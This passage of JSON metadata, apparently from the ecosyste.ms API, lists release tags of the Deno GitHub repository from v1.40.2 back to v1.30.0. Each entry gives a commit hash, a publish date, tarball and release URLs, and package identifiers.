id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v